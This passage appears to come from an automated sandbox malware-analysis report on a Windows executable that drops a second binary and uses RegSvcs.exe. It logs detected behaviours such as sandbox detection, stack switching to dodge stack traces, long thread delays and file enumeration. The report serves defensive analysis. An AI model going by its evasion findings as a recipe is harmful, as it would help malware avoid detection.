Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_0-97222
Source: C:\Users\user\AppData\Local\done\lustring.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\done\lustring.exe	API/Special instruction interceptor: Address: 155FE9C
Source: C:\Users\user\AppData\Local\done\lustring.exe	API/Special instruction interceptor: Address: 15C0EB4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599370	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599251	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598711	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598606	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598496	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597389	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597155	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597040	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596934	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596811	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596702	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596300	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595419	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595074	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594387	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593661	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598466	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597139	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595827	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595717	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594625	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 3681	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 6143	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2058	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7796	Jump to behavior

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	API coverage: 4.0 %
Source: C:\Users\user\AppData\Local\done\lustring.exe	API coverage: 4.1 %

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0025DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0025DBBE
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0022C2A2 FindFirstFileExW,	0_2_0022C2A2
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_002668EE FindFirstFileW,FindClose,	0_2_002668EE
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0026698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0026698F
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0025D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0025D076
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0025D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0025D3A9
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00269642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00269642
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0026979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0026979D
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00269B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00269B2B
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00265C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00265C97
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0014DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0014DBBE
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0011C2A2 FindFirstFileExW,	2_2_0011C2A2
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_001568EE FindFirstFileW,FindClose,	2_2_001568EE
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0015698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_0015698F
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0014D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0014D076
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0014D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0014D3A9
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00159642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00159642
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0015979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0015979D
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00159B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_00159B2B
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00155C97 FindFirstFileW,FindNextFileW,FindClose,	2_2_00155C97

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_001F42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001F42DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599370	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599251	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598711	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598606	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598496	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597389	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597155	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597040	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596934	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596811	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596702	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596300	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595419	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595074	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594387	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593999	Jump to behavior
